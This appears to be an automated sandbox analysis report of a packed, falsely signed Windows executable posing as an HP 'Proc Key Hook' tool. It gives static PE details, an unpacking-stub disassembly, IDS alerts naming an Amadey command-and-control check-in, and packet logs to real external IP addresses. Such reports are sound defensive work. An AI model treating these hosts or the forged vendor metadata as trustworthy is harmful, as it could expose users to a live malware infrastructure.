                                                                                                                                                                                SSDEEP:49152:xUF/vCM3L3Rsa8I/5d8GbF78NKMtzDKOR+OjNnUU0Y6TgI+QDWYYOu4e:iJ93L3KLO564Y0QDK/Oj5UU0pg
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............]N.. ...@....@.. ....................... z.....n./...@................................

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:00828e8e8686b000

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x8e5dc8
                                                                                                                                                                                Entrypoint Section:.boot
                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                                                                                                                                                Time Stamp:0x9F1DE197 [Wed Aug 5 09:40:39 2054 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:4328f7206db519cd4e82283211d98e83

                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                Signature Issuer:CN=Lenovo IdeaCentre 3 217IMB04 NW3EY15G
                                                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                Error Number:-2146762487
                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                • 11/9/2021 2:35:19 AM 11/10/2031 2:35:19 AM
                                                                                                                                                                                Subject Chain
                                                                                                                                                                                • CN=Lenovo IdeaCentre 3 217IMB04 NW3EY15G
                                                                                                                                                                                Version:3
                                                                                                                                                                                Thumbprint MD5:3C727BCDD4D9FF73D6BEAA00FD73CCC2
                                                                                                                                                                                Thumbprint SHA-1:FA7B7CB0A31DF50DFB0B4D680986DFE63FBD3254
                                                                                                                                                                                Thumbprint SHA-256:9C787F3B1CE8B94816723B662C2B13643CBE80D1544314420257050C4DF233AE
                                                                                                                                                                                Serial:1B27F1D1BBCDECB641123D13B1BD6E28

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                call 00007F9C1C9ECBB0h
                                                                                                                                                                                push ebx
                                                                                                                                                                                mov ebx, esp
                                                                                                                                                                                push ebx
                                                                                                                                                                                mov esi, dword ptr [ebx+08h]
                                                                                                                                                                                mov edi, dword ptr [ebx+10h]
                                                                                                                                                                                cld
                                                                                                                                                                                mov dl, 80h
                                                                                                                                                                                mov al, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                mov byte ptr [edi], al
                                                                                                                                                                                inc edi
                                                                                                                                                                                mov ebx, 00000002h
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                jnc 00007F9C1C9ECA4Ch
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                jnc 00007F9C1C9ECAB3h
                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                jnc 00007F9C1C9ECB47h
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                adc eax, eax
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                adc eax, eax
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                adc eax, eax
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                adc eax, eax
                                                                                                                                                                                je 00007F9C1C9ECA6Ah
                                                                                                                                                                                push edi
                                                                                                                                                                                mov eax, eax
                                                                                                                                                                                sub edi, eax
                                                                                                                                                                                mov al, byte ptr [edi]
                                                                                                                                                                                pop edi
                                                                                                                                                                                mov byte ptr [edi], al
                                                                                                                                                                                inc edi
                                                                                                                                                                                mov ebx, 00000002h
                                                                                                                                                                                jmp 00007F9C1C9EC9FBh
                                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                adc eax, eax
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                jc 00007F9C1C9ECA4Ch
                                                                                                                                                                                sub eax, ebx
                                                                                                                                                                                mov ebx, 00000001h
                                                                                                                                                                                jne 00007F9C1C9ECA8Ah
                                                                                                                                                                                mov ecx, 00000001h
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                adc ecx, ecx
                                                                                                                                                                                add dl, dl
                                                                                                                                                                                jne 00007F9C1C9ECA67h
                                                                                                                                                                                mov dl, byte ptr [esi]
                                                                                                                                                                                inc esi
                                                                                                                                                                                adc dl, dl
                                                                                                                                                                                jc 00007F9C1C9ECA4Ch
                                                                                                                                                                                push esi
                                                                                                                                                                                mov esi, edi
                                                                                                                                                                                sub esi, ebp

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8c03a0x50.idata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x74e0000x534e7.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x2ed4000x18d8.themida
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                0x20000x320000x19400False0.997399056312data7.98525936352IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                0x340000x54e680x10400False0.999849759615data7.98607664928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                0x8a0000xc0x200False0.58984375data4.37573476054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .idata0x8c0000x20000x200False0.16796875data1.14864242974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                `~\10x8e0000x20000x800False1.00537109375data7.91224427222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .themida0x900000x44c0000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .boot0x4dc0000x26da000x26da00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                `~\10x74a0000xc500xe00False0.844308035714data7.37488976272IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                `~\10x74c0000xc500xe00False0.845424107143data7.37990484138IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rsrc0x74e0000x534e70x53600False0.184428293666data5.6399714439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                                RT_BITMAP0x74f70c0x1828dBase IV DBT, blocks size 0, block length 6144, next free block index 40, next free block 1662261603, next used block 425923609ChineseChina
                                                                                                                                                                                RT_BITMAP0x750f340xc8dataChineseChina
                                                                                                                                                                                RT_BITMAP0x750ffc0x728dataChineseChina
                                                                                                                                                                                RT_BITMAP0x7517240x3b0dataChineseChina
                                                                                                                                                                                RT_BITMAP0x751ad40xe8GLS_BINARY_LSB_FIRSTChineseChina
                                                                                                                                                                                RT_BITMAP0x751bbc0x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x751fe80x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7524140x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7528400x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x752c6c0x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7530980x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7534c40x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7538f00x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x753d1c0x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7543880x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7549f40x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7550600x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7556cc0x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x755d380x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7563a40x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x756a100x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75707c0x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7576e80x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x757d540x66adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7583c00xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7584a80x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x758dd40xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x758ebc0x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7597e80xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7598d00x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75a1fc0xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75a2e40x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75ac100xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75acf80x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75b6240xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75b70c0x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75c0380xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75c1200x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75ca4c0xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75cb340x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75d4600xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75d5480x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75de740xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75df5c0x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75e8880x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75ecb40x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75f0e00x42aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75f50c0x92adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x75fe380x62cdataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7604640xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76054c0x4a0dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7609ec0x197adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7623680xc8dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7624300xc8dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7624f80xc8dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7625c00xc8dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7626880x182adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x763eb40x468dBase IV DBT, blocks size 0, block length 1024, next free block index 40, next free block 2004318071, next used block 2004318071EnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76431c0x528GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7648440x528GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x764d6c0x158dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x764ec40x188dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76504c0x1e8dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7652340xad2dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x765d080xad2dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7667dc0xb0adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7672e80x7e2dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x767acc0xb0adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7685d80x134dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76870c0x928dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7690340x32aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7693600x32aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76968c0xc2adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76a2b80x20adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76a4c40x20adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76a6d00x20adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76a8dc0x20adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76aae80x32aGLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76ae140x2256dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x76d06c0x602adataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7730980x2028dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7750c00x13dadataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x77649c0x13dadataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7778780x13dadataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x778c540xeb2dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x779b080x13dadataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x77aee40x13dadataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x77c2c00x13dadataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x77d69c0x13dadataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x77ea780xeb2dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x77f92c0x13dadataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x780d080x5a66dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7867700xb8dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x7868280x144dataEnglishUnited States
                                                                                                                                                                                RT_BITMAP0x78696c0xf8dataEnglishUnited States
                                                                                                                                                                                RT_MENU0x786a640xb4dataEnglishUnited States
                                                                                                                                                                                RT_MENU0x786b180x11cdataEnglishUnited States
                                                                                                                                                                                RT_ACCELERATOR0x786c340x88data
                                                                                                                                                                                RT_ACCELERATOR0x786cbc0x10Android binary XMLChineseChina
                                                                                                                                                                                RT_ACCELERATOR0x786ccc0x18dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x786ce40x54afC source, Non-ISO extended-ASCII text, with CRLF line terminators
                                                                                                                                                                                RT_RCDATA0x78c1940x897C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                RT_RCDATA0x78ca2c0x4130C source, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x790b5c0x9caC source, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x7915280x554dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x791a7c0x618dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x7920940x2c0dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x7923540x2d0dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x7926240x6434dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x798a580xd2edataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x7997880x438dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x799bc00x4f0dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x79a0b00x600cdataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x7a00bc0x410dataEnglishUnited States
                                                                                                                                                                                RT_RCDATA0x7a04cc0x288dataEnglishUnited States
                                                                                                                                                                                RT_VERSION0x7a07540x330data
                                                                                                                                                                                RT_MANIFEST0x7a0a840x336XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                RT_MANIFEST0x7a0dbc0x352ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                RT_MANIFEST0x7a11100x3d7XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                kernel32.dllGetModuleHandleA
                                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                                Version Infos

                                                                                                                                                                                DescriptionData
                                                                                                                                                                                Translation0x0000 0x04b0
                                                                                                                                                                                LegalCopyrightCopyright HP 2014
                                                                                                                                                                                Assembly Version1.0.0.0
                                                                                                                                                                                InternalNameflo.exe
                                                                                                                                                                                FileVersion1.0.0.0
                                                                                                                                                                                CompanyNameHP
                                                                                                                                                                                LegalTrademarks
                                                                                                                                                                                Comments
                                                                                                                                                                                ProductNameProcKeyHook.Properties
                                                                                                                                                                                ProductVersion1.0.0.0
                                                                                                                                                                                FileDescriptionProc Key Hook
                                                                                                                                                                                OriginalFilenameflo.exe

                                                                                                                                                                                Possible Origin

                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                ChineseChina
                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                11/11/21-12:26:23.176405UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499928.8.8.8192.168.2.5
                                                                                                                                                                                11/11/21-12:26:47.709565TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.5178.208.83.45
                                                                                                                                                                                11/11/21-12:27:01.384099TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4982880192.168.2.5178.208.83.45
                                                                                                                                                                                11/11/21-12:27:09.330623TCP100000122COMMUNITY WEB-MISC mod_jrun overflow attempt4984780192.168.2.5178.208.83.45
                                                                                                                                                                                11/11/21-12:27:43.631196UDP254DNS SPOOF query response with TTL of 1 min. and no authority53605168.8.8.8192.168.2.5

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Nov 11, 2021 12:25:37.853343010 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:37.910200119 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:37.910414934 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:38.239142895 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:38.315192938 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:38.317327976 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:38.477440119 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:40.035974979 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:40.093933105 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:40.149478912 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:46.910310030 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:46.969597101 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:46.969623089 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:46.969638109 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:46.969743967 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.050421953 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.107584953 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:53.146894932 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.203784943 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:53.219676018 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.282409906 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:53.285002947 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.345567942 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:53.372160912 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.431680918 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:53.478713036 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.561333895 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.618170977 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:53.620304108 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:53.621916056 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:53.679063082 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:53.728705883 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:55.074682951 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:55.132438898 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:55.181607962 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:55.239094019 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:55.291327953 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:55.617126942 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:55.674827099 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:55.728893042 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.525500059 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.582173109 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.582192898 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.582395077 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.582472086 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.582613945 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.582711935 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.597615004 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.639166117 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.639185905 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.639194012 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.639200926 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.639553070 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.639678955 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.696007967 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.696038961 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.696156025 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.696182013 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.696192980 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.696203947 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.696495056 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.696618080 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.696717978 CET4976259111192.168.2.5185.215.113.111
                                                                                                                                                                                Nov 11, 2021 12:25:56.696763992 CET5911149762185.215.113.111192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:25:56.697082043 CET5911149762185.215.113.111192.168.2.5
